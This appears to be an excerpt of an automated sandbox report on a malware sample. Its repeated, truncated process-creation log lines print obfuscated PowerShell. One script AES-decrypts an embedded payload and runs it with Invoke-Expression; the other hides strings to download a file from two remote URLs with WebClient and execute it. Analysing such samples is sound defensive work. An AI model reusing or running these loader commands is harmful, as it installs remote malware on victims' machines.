(Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7